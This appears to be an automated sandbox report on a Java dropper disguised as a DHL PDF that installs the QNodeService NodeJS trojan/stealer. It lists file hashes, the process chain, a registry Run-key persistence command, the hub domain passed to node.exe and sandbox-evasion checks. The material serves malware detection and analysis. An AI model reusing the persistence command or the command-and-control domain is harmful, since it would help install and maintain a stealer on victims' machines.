Analysis
-
max time kernel
46s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
27-11-2020 10:41
Static task
static1
Behavioral task
behavioral1
Sample
DHL_Nov 2020 at 1.85_8BZ290_PDF.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
DHL_Nov 2020 at 1.85_8BZ290_PDF.jar
Resource
win10v20201028
General
-
Target
DHL_Nov 2020 at 1.85_8BZ290_PDF.jar
-
Size
71KB
-
MD5
f204d9f0175eb6a66a0e312d63477680
-
SHA1
e161a465e339be0ec43ba30ee7b0c25a9b40dc0e
-
SHA256
d529003a6e1708637cc07277bfbef218db0dcaec7eed84b28567910f439297ee
-
SHA512
7d0c8c20539affd05bc5ee7de1cdc4cb65e2127b7972418c686677d7b4d12e34803446f73bce0406fdeeea6ab72c9fabee5aeb81985bce1502aabaa9d531c227
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
Processes:
node.exenode.exenode.exepid process 1000 node.exe 640 node.exe 2828 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\a7711235-3d47-45fc-91ec-f845beae6ac6 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 21 wtfismyip.com 22 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
node.exenode.exenode.exepid process 1000 node.exe 1000 node.exe 1000 node.exe 1000 node.exe 640 node.exe 640 node.exe 640 node.exe 640 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe 2828 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
java.exejavaw.exenode.exenode.exenode.execmd.exedescription pid process target process PID 944 wrote to memory of 3212 944 java.exe javaw.exe PID 944 wrote to memory of 3212 944 java.exe javaw.exe PID 3212 wrote to memory of 1000 3212 javaw.exe node.exe PID 3212 wrote to memory of 1000 3212 javaw.exe node.exe PID 1000 wrote to memory of 640 1000 node.exe node.exe PID 1000 wrote to memory of 640 1000 node.exe node.exe PID 640 wrote to memory of 2828 640 node.exe node.exe PID 640 wrote to memory of 2828 640 node.exe node.exe PID 2828 wrote to memory of 3596 2828 node.exe cmd.exe PID 2828 wrote to memory of 3596 2828 node.exe cmd.exe PID 3596 wrote to memory of 1856 3596 cmd.exe reg.exe PID 3596 wrote to memory of 1856 3596 cmd.exe reg.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\DHL_Nov 2020 at 1.85_8BZ290_PDF.jar"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2046ecee.tmp2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ntums.mooo.com3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vd0F0V\boot.js --hub-domain ntums.mooo.com4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vd0F0V\boot.js --hub-domain ntums.mooo.com5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "a7711235-3d47-45fc-91ec-f845beae6ac6" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "a7711235-3d47-45fc-91ec-f845beae6ac6" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestampMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Local\Temp\2046ecee.tmpMD5
f204d9f0175eb6a66a0e312d63477680
SHA1e161a465e339be0ec43ba30ee7b0c25a9b40dc0e
SHA256d529003a6e1708637cc07277bfbef218db0dcaec7eed84b28567910f439297ee
SHA5127d0c8c20539affd05bc5ee7de1cdc4cb65e2127b7972418c686677d7b4d12e34803446f73bce0406fdeeea6ab72c9fabee5aeb81985bce1502aabaa9d531c227
-
C:\Users\Admin\AppData\Local\Temp\_qhub_node_vd0F0V\boot.jsMD5
3859487feb5152e9d1afc4f8cd320608
SHA17bf154c9ddf3a71abf15906cdb60773e8ae07b62
SHA2568d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
SHA512826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
memory/640-180-0x0000000000000000-mapping.dmp
-
memory/640-182-0x000001F293400000-0x000001F293401000-memory.dmpFilesize
4KB
-
memory/1000-179-0x00000058651C0000-0x00000058651C1000-memory.dmpFilesize
4KB
-
memory/1000-175-0x0000000000000000-mapping.dmp
-
memory/1856-188-0x0000000000000000-mapping.dmp
-
memory/2828-184-0x0000000000000000-mapping.dmp
-
memory/2828-186-0x0000016F31B40000-0x0000016F31B41000-memory.dmpFilesize
4KB
-
memory/3212-56-0x0000000000000000-mapping.dmp
-
memory/3596-187-0x0000000000000000-mapping.dmp